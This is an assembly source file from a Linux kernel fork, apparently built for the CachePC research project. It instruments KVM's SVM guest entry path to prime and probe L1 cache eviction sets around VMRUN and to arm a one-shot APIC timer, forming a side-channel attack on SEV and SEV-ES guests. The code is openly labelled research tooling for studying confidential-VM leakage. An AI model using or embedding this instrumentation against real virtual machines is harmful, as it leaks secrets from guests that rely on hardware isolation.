cachepc-linux

Fork of AMDESE/linux with modifications for the CachePC side-channel attack
git clone https://git.sinitax.com/sinitax/cachepc-linux

vmenter.S (6306B)


/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/asm.h>
#include <asm/bitsperlong.h>
#include <asm/kvm_vcpu_regs.h>
#include <asm/nospec-branch.h>

#define WORD_SIZE (BITS_PER_LONG / 8)

/* Intentionally omit RAX as it's context switched by hardware */
#define VCPU_RCX	__VCPU_REGS_RCX * WORD_SIZE
#define VCPU_RDX	__VCPU_REGS_RDX * WORD_SIZE
#define VCPU_RBX	__VCPU_REGS_RBX * WORD_SIZE
/* Intentionally omit RSP as it's context switched by hardware */
#define VCPU_RBP	__VCPU_REGS_RBP * WORD_SIZE
#define VCPU_RSI	__VCPU_REGS_RSI * WORD_SIZE
#define VCPU_RDI	__VCPU_REGS_RDI * WORD_SIZE

#ifdef CONFIG_X86_64
#define VCPU_R8		__VCPU_REGS_R8  * WORD_SIZE
#define VCPU_R9		__VCPU_REGS_R9  * WORD_SIZE
#define VCPU_R10	__VCPU_REGS_R10 * WORD_SIZE
#define VCPU_R11	__VCPU_REGS_R11 * WORD_SIZE
#define VCPU_R12	__VCPU_REGS_R12 * WORD_SIZE
#define VCPU_R13	__VCPU_REGS_R13 * WORD_SIZE
#define VCPU_R14	__VCPU_REGS_R14 * WORD_SIZE
#define VCPU_R15	__VCPU_REGS_R15 * WORD_SIZE
#endif

.section .noinstr.text, "ax"

#include "../cachepc/macro.S"

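/*
 * CachePC register stashing: the macros below keep a second register set in
 * the XMM registers so the prime/probe code can run with a full set of GPRs
 * without spilling to memory.  apply_regs expands \func once for each GPR
 * other than %r15, pairing it with one of %xmm0-%xmm14; %r15 is left out so
 * swap_reg can use it as scratch.  save_vm copies the current GPRs into the
 * XMM registers, exit_vm/enter_vm swap the two sets, and enter_vm also
 * restores %r15 from %xmm15 since the swap clobbers it.
 */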
.macro apply_regs func
	\func %rax %xmm0
	\func %rbx %xmm1
	\func %rcx %xmm2
	\func %rdx %xmm3
	\func %rbp %xmm4
	\func %rsp %xmm5
	\func %rdi %xmm6
	\func %rsi %xmm7
	\func %r8  %xmm8
	\func %r9  %xmm9
	\func %r10 %xmm10
	\func %r11 %xmm11
	\func %r12 %xmm12
	\func %r13 %xmm13
	\func %r14 %xmm14
.endm

.macro save_reg src dst
	movq \src, \dst
.endm

.macro swap_reg src dst
	movq \src, %r15
	movq \dst, \src
	movq %r15, \dst
.endm

.macro save_vm
	apply_regs save_reg
.endm

.macro exit_vm
	apply_regs swap_reg
.endm

.macro enter_vm
	apply_regs swap_reg
	movq %xmm15, %r15 # fixup tmp reg
.endm

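/*
 * wrap_prime runs just before VMRUN with the current GPRs swapped out into
 * the XMM registers (exit_vm): it reads the cpc_* control variables,
 * optionally flushes the caches and primes the eviction sets when
 * cpc_prime_probe is set (prime macro from ../cachepc/macro.S), optionally
 * arms a one-shot local APIC timer when cpc_apic_oneshot is set, and
 * finally swaps the registers back in (enter_vm).
 */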
.macro wrap_prime name
	exit_vm

	# read vars before prime
	xor %rax, %rax
	movb cpc_apic_oneshot, %al
	mov %rax, %r11			# r11 = cpc_apic_oneshot
	mov cpc_apic_timer, %eax
	mov %rax, %r12			# r12 = cpc_apic_timer
	mov cpc_apic_timer_softdiv, %eax
	mov %rax, %r13			# r13 = cpc_apic_timer_softdiv
	movb cpc_prime_probe, %al
	mov %rax, %r14			# r14 = cpc_prime_probe (checked via %al)

	# do prime
	mov %r14, %rax
	cmp $0, %al
	je skip_prime_\name
	wbinvd				# flush caches before priming
	mov cpc_ds, %r9
	prime \name %r9 %r10 %r8
skip_prime_\name:

	# do oneshot
	mov %r11, %rax
	cmp $0, %al
	je skip_apic_\name
	# asm from cpc_apic_oneshot_run: program the local APIC timer
	mov $0xec, %edx
	mov %edx, 0xffffffffff5fd320	# LVT Timer: vector 0xec, one-shot mode
	mov $0x0b, %edx
	mov %edx, 0xffffffffff5fd3e0	# Timer Divide Configuration: divide by 1
	xor %edx, %edx
	mov %r12, %rax
	div %r13			# cpc_apic_timer / cpc_apic_timer_softdiv
	mov %eax, 0xffffffffff5fd380	# Timer Initial Count: arm the timer
skip_apic_\name:

	enter_vm
.endm

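/*
 * wrap_probe runs right after VMEXIT: it swaps the current GPRs out into
 * the XMM registers (exit_vm) and, when cpc_prime_probe is set, probes the
 * eviction sets using the L1 miss performance counter (probe macro from
 * ../cachepc/macro.S), then swaps the registers back in (enter_vm).
 */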
.macro wrap_probe name
	exit_vm

	# do probe
	mov %r14, %rax
	cmp $0, %al
	je skip_probe_\name
	probe \name $CPC_L1MISS_PMC %r8 %r9 %r10 %r11 %r12
skip_probe_\name:

	enter_vm
.endm


/**
 * __svm_vcpu_run - Run a vCPU via a transition to SVM guest mode
 * @vmcb_pa:	unsigned long
 * @regs:	unsigned long * (to guest registers)
 */
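/*
 * CachePC instrumentation: save_vm stashes the GPRs at entry, and the VMRUN
 * below is bracketed by wrap_prime/wrap_probe to prime the cache before
 * guest execution and probe it immediately after VMEXIT.
 */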
SYM_FUNC_START(__svm_vcpu_run)
	save_vm

	push %_ASM_BP
#ifdef CONFIG_X86_64
	push %r15
	push %r14
	push %r13
	push %r12
#else
	push %edi
	push %esi
#endif
	push %_ASM_BX

	/* Save @regs. */
	push %_ASM_ARG2

	/* Save @vmcb. */
	push %_ASM_ARG1

	/* Move @regs to RAX. */
	mov %_ASM_ARG2, %_ASM_AX

	/* Load guest registers. */
	mov VCPU_RCX(%_ASM_AX), %_ASM_CX
	mov VCPU_RDX(%_ASM_AX), %_ASM_DX
	mov VCPU_RBX(%_ASM_AX), %_ASM_BX
	mov VCPU_RBP(%_ASM_AX), %_ASM_BP
	mov VCPU_RSI(%_ASM_AX), %_ASM_SI
	mov VCPU_RDI(%_ASM_AX), %_ASM_DI
#ifdef CONFIG_X86_64
	mov VCPU_R8 (%_ASM_AX),  %r8
	mov VCPU_R9 (%_ASM_AX),  %r9
	mov VCPU_R10(%_ASM_AX), %r10
	mov VCPU_R11(%_ASM_AX), %r11
	mov VCPU_R12(%_ASM_AX), %r12
	mov VCPU_R13(%_ASM_AX), %r13
	mov VCPU_R14(%_ASM_AX), %r14
	mov VCPU_R15(%_ASM_AX), %r15
#endif

	/* "POP" @vmcb to RAX. */
	pop %_ASM_AX

	wrap_prime sev_vcpu_run

	sti
1:	vmrun %_ASM_AX
2:	cli

	wrap_probe sev_vcpu_run

#ifdef CONFIG_RETPOLINE
	/* IMPORTANT: Stuff the RSB immediately after VM-Exit, before RET! */
	FILL_RETURN_BUFFER %_ASM_AX, RSB_CLEAR_LOOPS, X86_FEATURE_RETPOLINE
#endif

	/* "POP" @regs to RAX. */
	pop %_ASM_AX

	/* Save all guest registers.  */
	mov %_ASM_CX,   VCPU_RCX(%_ASM_AX)
	mov %_ASM_DX,   VCPU_RDX(%_ASM_AX)
	mov %_ASM_BX,   VCPU_RBX(%_ASM_AX)
	mov %_ASM_BP,   VCPU_RBP(%_ASM_AX)
	mov %_ASM_SI,   VCPU_RSI(%_ASM_AX)
	mov %_ASM_DI,   VCPU_RDI(%_ASM_AX)
#ifdef CONFIG_X86_64
	mov %r8,  VCPU_R8 (%_ASM_AX)
	mov %r9,  VCPU_R9 (%_ASM_AX)
	mov %r10, VCPU_R10(%_ASM_AX)
	mov %r11, VCPU_R11(%_ASM_AX)
	mov %r12, VCPU_R12(%_ASM_AX)
	mov %r13, VCPU_R13(%_ASM_AX)
	mov %r14, VCPU_R14(%_ASM_AX)
	mov %r15, VCPU_R15(%_ASM_AX)
#endif

	/*
	 * Clear all general purpose registers except RSP and RAX to prevent
	 * speculative use of the guest's values, even those that are reloaded
	 * via the stack.  In theory, an L1 cache miss when restoring registers
	 * could lead to speculative execution with the guest's values.
	 * Zeroing XORs are dirt cheap, i.e. the extra paranoia is essentially
	 * free.  RSP and RAX are exempt as they are restored by hardware
	 * during VM-Exit.
	 */
	xor %ecx, %ecx
	xor %edx, %edx
	xor %ebx, %ebx
	xor %ebp, %ebp
	xor %esi, %esi
	xor %edi, %edi
#ifdef CONFIG_X86_64
	xor %r8d,  %r8d
	xor %r9d,  %r9d
	xor %r10d, %r10d
	xor %r11d, %r11d
	xor %r12d, %r12d
	xor %r13d, %r13d
	xor %r14d, %r14d
	xor %r15d, %r15d
#endif

	pop %_ASM_BX

#ifdef CONFIG_X86_64
	pop %r12
	pop %r13
	pop %r14
	pop %r15
#else
	pop %esi
	pop %edi
#endif
	pop %_ASM_BP
	RET

	/* VMRUN faulted: tolerate the fault if KVM is shutting down, else die. */
3:	cmpb $0, kvm_rebooting
	jne 2b
	ud2

	_ASM_EXTABLE(1b, 3b)

SYM_FUNC_END(__svm_vcpu_run)

/**
 * __svm_sev_es_vcpu_run - Run a SEV-ES vCPU via a transition to SVM guest mode
 * @vmcb_pa:	unsigned long
 */
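/*
 * CachePC instrumentation as in __svm_vcpu_run above; additionally, the xmm
 * regs are cleared across the SEV-ES VMRUN, so the values wrap_probe expects
 * are reloaded from cpc_ds_probe and cpc_prime_probe before probing.
 */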
SYM_FUNC_START(__svm_sev_es_vcpu_run)
	save_vm

	push %_ASM_BP
#ifdef CONFIG_X86_64
	push %r15
	push %r14
	push %r13
	push %r12
#else
	push %edi
	push %esi
#endif
	push %_ASM_BX

	/* Move @vmcb to RAX. */
	mov %_ASM_ARG1, %_ASM_AX

	wrap_prime sev_es_vcpu_run

	sti
1:	vmrun %_ASM_AX
2:	cli

	# In SEV-ES the cpu register state is not restored after vmrun and the
	# xmm regs have been cleared, so reload the values that wrap_probe
	# expects to swap back into %r8 and %r14.
	movq cpc_ds_probe, %xmm8
	movq cpc_prime_probe, %xmm14
	wrap_probe sev_es_vcpu_run

#ifdef CONFIG_RETPOLINE
	/* IMPORTANT: Stuff the RSB immediately after VM-Exit, before RET! */
	FILL_RETURN_BUFFER %_ASM_AX, RSB_CLEAR_LOOPS, X86_FEATURE_RETPOLINE
#endif

	pop %_ASM_BX

#ifdef CONFIG_X86_64
	pop %r12
	pop %r13
	pop %r14
	pop %r15
#else
	pop %esi
	pop %edi
#endif
	pop %_ASM_BP
	RET

3:	cmpb $0, kvm_rebooting
	jne 2b
	ud2

	_ASM_EXTABLE(1b, 3b)

SYM_FUNC_END(__svm_sev_es_vcpu_run)